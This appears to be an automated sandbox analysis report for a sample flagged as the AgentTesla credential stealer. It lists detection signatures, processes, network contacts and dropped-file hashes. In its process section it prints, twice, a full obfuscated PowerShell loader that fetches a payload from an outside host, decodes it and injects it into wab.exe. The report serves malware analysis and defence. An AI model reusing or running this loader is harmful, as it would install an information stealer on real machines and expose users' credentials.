Analysis Overview
SHA256
53092890138641a8f174f2575e5078bcecf0f962f88f15169315ee58dce13342
Threat Level: Known bad
The file 53092890138641a8f174f2575e5078bcecf0f962f88f15169315ee58dce13342.lzh was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Detect packed .NET executables. Mostly AgentTeslaV4.
Detects executables referencing many file transfer clients. Observed in information stealers
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables referencing Windows vault credential objects. Observed in infostealers
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
Detects executables referencing many email and collaboration clients. Observed in information stealers
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-04 01:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-04 01:22
Reported
2024-06-04 01:25
Platform
win7-20240221-en
Max time kernel
142s
Max time network
148s
Command Line
Signatures
AgentTesla
Detect packed .NET executables. Mostly AgentTeslaV4.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many email and collaboration clients. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many file transfer clients. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2384 set thread context of 632 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nedfrendes.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | hutch.duniareligi.com | udp |
| ID | 202.43.173.180:443 | hutch.duniareligi.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
Files
memory/2480-4-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp
memory/2480-5-0x000000001B530000-0x000000001B812000-memory.dmp
memory/2480-6-0x0000000002800000-0x0000000002808000-memory.dmp
memory/2480-7-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-8-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-9-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-10-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-11-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4CBQB6PSQ5DYFOHYMMLI.temp
| MD5 | 188d7ff50f1b9b7ee636da4db2aaeba7 |
| SHA1 | daaa7c4ac9fbeef2bfb925679fff9b3e3428adf4 |
| SHA256 | e13d47cc374756bcd58188ecfdddab1d3aaa76010b86c32719eb709ab8f432e4 |
| SHA512 | f177d36258c9f8929de098ef74ecdcc3c29b63a72f20a4cfbb9928b9bbb5bf44470263f7a6b31fa8a65ecc5f6bdaacc1eeb9ee34060f1485d867ade73584ec16 |
C:\Users\Admin\AppData\Roaming\victress.Dul
| MD5 | e55f25384365d8cb1cc6ffb71600ff50 |
| SHA1 | ffe4f34c419fd6dba313e21d53ce9b7ed309ee80 |
| SHA256 | d83c4794938826611110d3b660ae9876a5c17f8254f258cf4f64889db2c47b5e |
| SHA512 | 7f62e819c75ca50deb502dbf6b8301f926ef125d04ae0806cf50d9a76a31eddeb59142035a0e622e70e941b80769ee54abc1a64d4474f0a0ebba2023b988342c |
memory/2384-17-0x0000000006440000-0x000000000A1DE000-memory.dmp
memory/2480-19-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/2480-18-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp
memory/632-36-0x0000000000F10000-0x0000000001F72000-memory.dmp
memory/632-38-0x0000000000F10000-0x0000000001F72000-memory.dmp
memory/2480-39-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp
memory/632-40-0x0000000000F10000-0x0000000000F50000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-04 01:22
Reported
2024-06-04 01:25
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
AgentTesla
Detect packed .NET executables. Mostly AgentTeslaV4.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many email and collaboration clients. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables referencing many file transfer clients. Observed in information stealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2896 set thread context of 3156 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nedfrendes.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
